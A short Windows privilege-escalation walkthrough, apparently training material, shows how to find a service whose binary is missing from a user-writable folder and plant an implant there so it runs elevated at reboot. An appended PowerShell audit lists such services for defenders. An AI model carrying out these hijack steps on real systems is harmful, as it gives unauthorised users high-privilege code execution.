First: Let’s try to find missing services

Autorunsc64.exe -a s | more

Second: Take a look at the service configuration

sc qc AdobeUpdate

Notice that the service is configured to use this binary, but the binary is not there.

Third: Let’s check if we have write access to that folder

icacls C:\RTO\bin

And we have modify access

Fourth: Copy our malicious service to that path

copy C:\Users\IEUser\Desktop\LPE\implant\implantsrv.exe C:\RTO\bin\AdobeUpdate.exe

Now, on reboot, the service will start with high-integrity access
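
The same checks from the defender's side, as an added example that is not part of the original write-up: a PowerShell audit that lists every service whose configured binary is missing and reports which low-privileged principals could create a file in its folder. The function names, the list of principals and the path-parsing regex are assumptions made for this example.

```powershell
# Added example (not from the original write-up): list services whose
# configured binary is missing and show who could create it. Run elevated.
# Assumption: these English account names are the low-privileged principals.
$lowPriv = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
           'NT AUTHORITY\INTERACTIVE'
$createFiles = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles
$inheritOnly = [int][System.Security.AccessControl.PropagationFlags]::InheritOnly

function Get-ServiceBinaryPath([string]$PathName) {
    # Simplification: take a quoted path, else everything up to the first ".exe".
    if ($PathName -match '^\s*"([^"]+)"' -or $PathName -match '^\s*(.+?\.exe)(\s|$)') {
        return [Environment]::ExpandEnvironmentVariables($Matches[1])
    }
}

function Get-LowPrivWriteAce([string]$Directory) {
    # Walk up to the nearest existing folder: whoever can write there can
    # create the missing subfolders and the binary itself.
    while ($Directory -and -not (Test-Path -LiteralPath $Directory -PathType Container)) {
        $Directory = Split-Path -Path $Directory -Parent -ErrorAction SilentlyContinue
    }
    if (-not $Directory) { return }
    (Get-Acl -LiteralPath $Directory).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $lowPriv -contains $_.IdentityReference.Value -and
        ([int]$_.PropagationFlags -band $inheritOnly) -eq 0 -and
        ([int]$_.FileSystemRights -band $createFiles) -ne 0
    } | ForEach-Object { '{0} ({1})' -f $_.IdentityReference.Value, $_.FileSystemRights }
}

Get-CimInstance -ClassName Win32_Service | ForEach-Object {
    $bin = Get-ServiceBinaryPath $_.PathName
    if ($bin -and -not (Test-Path -LiteralPath $bin -PathType Leaf)) {
        [pscustomobject]@{
            Service    = $_.Name
            StartMode  = $_.StartMode
            RunsAs     = $_.StartName
            MissingBin = $bin
            WritableBy = (Get-LowPrivWriteAce (Split-Path -Path $bin -Parent)) -join '; '
        }
    }
} | Format-List
```

Any result with a non-empty WritableBy is the condition shown in the steps above. Remove or repair the stale service entry and restrict write access on the folder to administrators and SYSTEM.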